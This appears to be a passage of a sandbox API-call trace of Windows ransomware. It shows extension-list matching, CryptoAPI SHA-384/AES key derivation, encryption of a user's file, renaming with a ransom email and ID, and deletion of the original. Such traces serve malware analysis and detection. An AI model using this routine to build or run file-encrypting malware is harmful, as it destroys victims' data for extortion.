.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.152] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.152] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.152] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.158] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0xdfad, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0xdfad, lpOverlapped=0x0) returned 1
	[0183.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.161] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb220) returned 1
	[0183.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.164] CryptCreateHash (in: hProv=0xfcb220, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0183.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.164] CryptHashData (hHash=0xfb8f30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.164] CryptDeriveKey (in: hProv=0xfcb220, Algid=0x6610, hBaseData=0xfb8f30, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb95b0) returned 1
	[0183.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.164] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xdfad, dwBufLen=0xdfad | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xdfb0) returned 1
	[0183.166] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.166] RtlMoveMemory (in: Destination=0xfec140, Source=0xfde188, Length=0xdfad | out: Destination=0xfec140) 
	[0183.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.167] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfec140*, pdwDataLen=0x18a1ec*=0xdfad, dwBufLen=0xdfb0 | out: pbData=0xfec140*, pdwDataLen=0x18a1ec*=0xdfb0) returned 1
	[0183.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.169] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0183.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.170] CryptDestroyHash (hHash=0xfb8f30) returned 1
	[0183.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.170] CryptReleaseContext (hProv=0xfcb220, dwFlags=0x0) returned 1
	[0183.170] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.170] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.171] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0183.172] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 113
	[0183.173] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0183.174] WriteFile (in: hFile=0x39c, lpBuffer=0xfec140*, nNumberOfBytesToWrite=0xdfb0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfec140*, lpNumberOfBytesWritten=0x18a648*=0xdfb0, lpOverlapped=0x0) returned 1
	[0183.179] CloseHandle (hObject=0x39c) returned 1
	[0183.179] CloseHandle (hObject=0x390) returned 1
	[0183.179] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv")) returned 1
	[0183.202] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv")) returned 0
	[0183.203] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58546270, ftCreationTime.dwHighDateTime=0x1d96883, ftLastAccessTime.dwLowDateTime=0x7031d8f0, ftLastAccessTime.dwHighDateTime=0x1d96f1d, ftLastWriteTime.dwLowDateTime=0x7031d8f0, ftLastWriteTime.dwHighDateTime=0x1d96f1d, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="nGcmRoCLewN1vtz.swf", cAlternateFileName="NGCMRO~1.SWF")) returned 1
	[0183.203] lstrcmpW (lpString1="nGcmRoCLewN1vtz.swf", lpString2="..") returned 1
	[0183.203] lstrcmpW (lpString1="nGcmRoCLewN1vtz.swf", lpString2=".") returned 1
	[0183.203] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.203] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="nGcmRoCLewN1vtz.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\nGcmRoCLewN1vtz.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\nGcmRoCLewN1vtz.swf"
	[0183.203] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\nGcmRoCLewN1vtz.swf") returned 67
	[0183.203] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.205] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\nGcmRoCLewN1vtz.swf", cchLength=0x43 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf") returned 0x43
	[0183.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.205] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.205] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf"
	[0183.205] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf") returned 67
	[0183.205] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.206] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0183.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.206] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3